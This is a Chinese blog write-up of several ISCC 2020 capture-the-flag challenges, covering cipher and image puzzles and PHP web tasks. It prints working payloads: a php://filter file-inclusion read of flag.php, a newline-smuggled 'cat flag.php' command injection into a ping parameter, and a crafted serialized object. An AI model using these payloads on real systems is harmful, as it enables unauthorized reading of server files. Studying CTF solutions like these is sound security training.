ISCC2020部分wp

最新推荐文章于 2022-08-18 15:25:52 发布
最新推荐文章于 2022-08-18 15:25:52 发布
阅读量817 收藏 1
点赞数
分类专栏: CTF WriteUp 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46150940/article/details/107212566
版权
CTF 同时被 2 个专栏收录
39 篇文章 12 订阅
订阅专栏
WriteUp
15 篇文章 1 订阅
订阅专栏

ISCC签到

在这里插入图片描述
下载附件,拖进winhex,修改图片高度
在这里插入图片描述
提交ISCC{D3tivtm_ zv_ Tq5I_Dygef},结果错误。应该进行了加密,尝试了栅栏密码和凯撒密码也不对,最后才知道是维吉尼亚加密。题目中的high应该就是key。
在这里插入图片描述
flag:ISCC{W3lcome_ to_ Mi5C_ Wryyy}

阿森的爱情-1

Where is file?-1

考察php伪协议

<?php
show_source(__FILE__);
echo $_GET['hello'];
$file=$_GET['file'];
while (strstr($file, "file://")) {
    $file=str_replace("file://", "", $file);
}
include($file);
?>

从给出的代码来看,参数名是file,并且过滤了file协议。使用伪协议(根据源码,不能使用file协议)读取flag内容:

Payload: ?file=php://filter/read=convert.base64-encode/resource=flag.php

可以得到一串求字符串:
PD9waHAKJGE9ImZsYWd7d2ViX2luY2x1ZGVfZmlsZX0iOwo/Pgo=

Base64解密可得到:

<?php
$a="flag{web_include_file}";
?>

阿帅的爱情

<?php
if(!isset($_GET["ip"])){
    show_source(__file__);
} else
{
    $ip=$_GET["ip"];
    $pattern="/[;|&].*[a-zA-Z]+/";
    if(preg_match($pattern,$ip)!=0){
        die('bad domain');
    }
    try {
        $result = shell_exec('ping -c 4 ' . $ip);
    }
    catch(Exception $e) {
        $result = $e->getMessage();
        echo $result;
    }
    $result = str_replace("\n", "<br>", $result);
    echo $result;
}


?ip=%0als

在这里插入图片描述
http://101.201.126.95:7013/?ip=%0acat%20flag.php

?ip=%0acat flag.php

在这里插入图片描述

Php is the best language

在这里插入图片描述
打开下载的文件

<?php  
@error_reporting(1);
include 'flag.php';
class baby 
{
    public $file;
    function __toString()      
    {
        if(isset($this->file))
        {
            $filename = "./{$this->file}";
            if (base64_encode(file_get_contents($filename)))
            {
                return base64_encode(file_get_contents($filename));
            }
        }
    }
}


if (isset($_GET['data']))
{
    $data = $_GET['data'];
        $good = unserialize($data);
        echo $good;
}
else 
{
    $url='./index.php';
}

$html='';
if(isset($_POST['test'])){
    $s = $_POST['test'];
    $html.="<p>谢谢参与!</p>";
}
?>

修改代码

<?php  
@error_reporting(1);
include 'flag.php';
class baby 
{
    public $file="flag.php";
    function __toString()      
    {
        if(isset($this->file))
        {
            $filename = "./{$this->file}";
            if (base64_encode(file_get_contents($filename)))
            {
                return base64_encode(file_get_contents($filename));
            }
        }
    }
}

$a = new baby;
echo serialize($a);
?>

运行上面的代码,可得到:

O:4:"baby":1:{s:4:"file";s:8:"flag.php";}

在这里插入图片描述
这串字符串应该是Base64加密
在这里插入图片描述

ISCC成绩查询-1

在这里插入图片描述
下载得到一个PNG文件,使用Stegsolve,发现隐写以下内容

在这里插入图片描述
基本确定是一个哥尼斯堡七桥问题,观察到上图只有14、5号点是奇度数节点,所以是存在欧拉通路的半欧拉图。从两个奇度数点出发,找到符合图片顺序的欧拉通路。
在这里插入图片描述
连接后为:TRLNCHHAFCIEEIEEPR
在这里插入图片描述

flag{THERAILFENCECIPHER}
Atkxor
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ISCC2020-Web题解
Lemon's blog
05-27 2151
神秘组织的邮件-2 点击提交数字会发生改变,因为这次的赛制有一个关联,通过上一题 得出的flag是加键乘除,又提示要联系起来,就想起了之前做有一道秋名山车神那道题,只不过这个题需要将运算符手动添加,脚本如下: import requests from bs4 import BeautifulSoup import re import time if __name__ == '__main__': time_start=time.time() url = 'http://101.201.126
ISCC-2020-WEB-What can images do-writep
Bcdlbgm的博客
05-31 308
WEB What can images do(文件包含+文件上传) 其实序列号也做出来了,没有立马写后来就忘了。当时立马写wp的只有这个一个。 题目:http://101.201.126.95:7004/ 可以看到有个filename,参数是文件名。可以试试包含 ../../../../etc/passwd 成功但是不知道后台是include还是file_get_content。(这两者是有区别的可以参考这里,(链接11)) 然后我们再尝试一下php文件,可以看到包含了。那么就是include。 然
CCF CSP 201803-1 跳一跳 C++ (100分)
XXisCC的博客
09-16 225
#include<iostream> using namespace std; int main() { int a[30]; int b[30] = { 0 };//记录每一次的得分 int sum = 0;//记录总分 for (int i = 0; i < 30; i++) { cin >> a[i]; if (a[i] == 0) break; } for (int i = 0, j = 1; i < 30; i++) { .
BUUCTF MISC LSB
moyikong的博客
01-07 1047
看到题目,知道了是一个lsb隐写题, 反手打开Stegsolve工具 然而在里面看了一圈,发现并没有flag等关键词,文件头是png格式,所以save bin下来,保存为1.png 打开后发现是一个二维码 所以直接扫描得到flag cumtctf{1sb_i4_s0_Ea4y},题目要求以flag{}形式提交,所以最终的flag为: flag{1sb_i4_s0_Ea4y} ...
ISCC2020部分MISC总结
qwzf
05-29 3405
前言 这次ISCC,不得不说杂项题脑洞真大(脑袋坑太少,就做出了几道),并且没有Crypto题。但Web题目难度还行(不容易的题,主要是涉及脑洞),这里先总结一下做出来的MISC题,另起一篇总结Web题。 MISC1:ISCC签到 题目难度:简单 考察:图片高度+维吉尼亚密码 在winhex里改图片高度,得到 然后进行维吉尼亚密码解密,并且很容易想到密钥是high MISC2:寻找小明-1 题目难度:普通 考察:Stegsolve+使用cv2库 cv2模块使用 参考: CV2模块使用(详细教程) 模块cv
ISCC2021-MISC部分题目.zip
08-07
ISCC2021-MISC部分题目.zip
ISCC2022题目附件
06-06
”信息是社会发展的重要战略资源,国际上围绕信息的获取、使用和控制的斗争愈演愈烈,信息安全保障能力是综合国力、经济竞争实力和生存能力的重要组成部分,是世纪之交世界各国奋力攀登的至高点。 信息安全与对抗...
ISCC-2020-J07
03-26
ISCC-2020-J07
ISCC2013部分题目
07-15
ISCC2013部分题目,有附件
ISCC-2020-J06
02-14
ISCC-2020-J06
ISCC2019个人挑战赛题目练习
05-05
为了让大家能够拿到题目练习,增强网络安全技术和大赛经验的积累,可以下载这些题目来练习。解题思路在我的博客。
网鼎2020-朱雀组.rar
05-24
网鼎2020-朱雀组.rar除了web题
Reverse 解法2:bang Writeup(安卓简单的加壳)(2020网鼎杯青龙组)
lostnerv的专栏
05-11 2972
在强力大佬的教导下,使用了另一种解法脱壳 一个脱简单壳的Xposed模块 我用到的工具: ApkShelling模块 Xposed android 8.0以下的模拟器或某能刷的实机(不做介绍) Android Studio jadx jadx导入截图还是如下: 模拟器 先说说这个模拟器,自己用AVD Manager创建或者网上下载的游戏模拟器,甚至用实体机都可以,但据dumpDex和Xposed安装最好是Android 8.0以下,高版本的还需要另换工具这里就不介绍了 。 root 首先要有ro
[安洵杯 2019]easy_serialize_php
ro4lsc的博客
05-07 6719
[安洵杯 2019]easy_serialize_php 现在对反序列化题目的思路越来越清晰了,也觉得更有趣了。 开淦 首先打开网页,点击source_code 一大串代码,给人眼花撩乱的感觉挺复杂的 简单审计了一下,还是发现了一个危险函数file_get_contents(),同时也看到了一个unserialize操作 else if($function == 'show_image'){ ...
北理模拟与暴力
QXK_Jack的博客
04-09 168
视频资料 约瑟夫环 #include <bits/stdc++.h> using namespace std; typedef long long ll; const int N = 1e6 + 500; const int mod = 10007; const int INF=0x3f3f3f3f; priority_queue<ll,vector<ll&gt...
ISCC 2019 reverse 简单Python(这个pyc有点东西)
qq_42777804的博客
05-17 1267
还是下载解压 打开发现pyc格式,我们直接在网上找在线反编译python的网站: https://tool.lu/pyc/ 反编译后 得到 分析算法:首先输入一段字符串,进入encode函数之后与字符串correct进行比较 encode函数就是将输入的字符串中每个字符ascii都与32进行异或运算,然后每个在加上16得到新的字符串,最后再将这个字符 串进行base64加密。...
BUUCTF刷题记录——MISC部分解答(一)
u013119911的博客
08-18 7185
buuctf 解答
WUST-CTF2020-WP
夏日 の blog
03-29 5276
目录WEBcheckinadminCV Makereasywebtrain yourself to be godlyMISCSpace ClubWelcomeAlison likes jojoShopgirlfriend小结 WEB checkin 打开页面显示Who’s the author?,回到题目发现作者是52HeRtz,输入52HeRtz发现有截断,f12选中输入框把maxlength改...
2020网鼎杯wp
qq_40648358的博客
05-11 4141
2020网鼎杯wp_XJUSECMISC签到WEBfilejavaAreUSerialznotesCRYPTOboomyou raise me upPWNboom1REsignaljockerbang MISC 签到 点进去是选战队图标 全部通过后会让输入token 然后能在console看到flag WEB filejava 打开题目,查看基本的功能后发现有一个文件下载功能,尝试穿越目录发现web.xml 再次寻找这几个servlet的字节码在classes/cn/abc/servle
ISCC where
最新发布
09-08
ISCC是指"Intelligent Self-Configuring Cluster",其中的"ISCC"表示智能自配置集群。在ISCC中,有两种集群形式,一种是分散式集群,另一种是集中式集群。在分散式集群中,每个节点都有潜力成为簇头,而在集中式集群中,基站选择最佳的簇头。这里的"最佳"是通过一些规则来近似确定的。在存储的过程中,s2占据了多个字节,而先分配的字节通常被放在低地址处。由于s2、v4、v5和v6的地址是相连的,所以当对s2的起始地址进行19个字节的异或处理时,v4、v5和v6中的数值也会被处理。<span class="em">1</span><span class="em">2</span><span class="em">3</span>

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Atkxor

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值